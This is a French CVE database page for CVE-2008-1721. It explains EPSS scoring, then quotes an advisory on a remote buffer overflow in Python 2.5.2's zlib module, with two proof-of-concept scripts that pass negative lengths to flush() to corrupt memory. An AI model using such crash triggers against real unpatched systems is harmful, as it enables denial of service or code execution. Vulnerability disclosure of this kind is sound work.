CVE-2008-1721 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/28715/info Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition. This issue affects Python 2.5.2; other versions may also be vulnerable. python-2.5.2-zlib-unflush-misallocation.py ------------------------------------------ #!/usr/bin/python import zlib msg = """ Desire to know why, and how, curiosity; such as is in no living creature but man: so that man is distinguished, not only by his reason, but also by this singular passion from other animals; in whom the appetite of food, and other pleasures of sense, by predominance, take away the care of knowing causes; which is a lust of the mind, that by a perseverance of delight in the continual and indefatigable generation of knowledge, exceedeth the short vehemence of any carnal pleasure. """ compMsg = zlib.compress(msg) bad = -24 decompObj = zlib.decompressobj() decompObj.decompress(compMsg) decompObj.flush(bad) python-2.5.2-zlib-unflush-signedness.py: ---------------------------------------- #!/usr/bin/python import zlib msg = """ Society in every state is a blessing, but government even in its best state is but a necessary evil in its worst state an intolerable one; for when we suffer, or are exposed to the same miseries by a government, which we might expect in a country without government, our calamities is heightened by reflecting that we furnish the means by which we suffer! Government, like dress, is the badge of lost innocence; the palaces of kings are built on the ruins of the bowers of paradise. For were the impulses of conscience clear, uniform, and irresistibly obeyed, man would need no other lawgiver; but that not being the case, he finds it necessary to surrender up a part of his property to furnish means for the protection of the rest; and this he is induced to do by the same prudence which in every other case advises him out of two evils to choose the least. Wherefore, security being the true design and end of government, it unanswerably follows that whatever form thereof appears most likely to ensure it to us, with the least expense and greatest benefit, is preferable to all others. """ * 1024 compMsg = zlib.compress(msg) bad = -2 decompObj = zlib.decompressobj() decompObj.decompress(compMsg, 1) decompObj.flush(bad)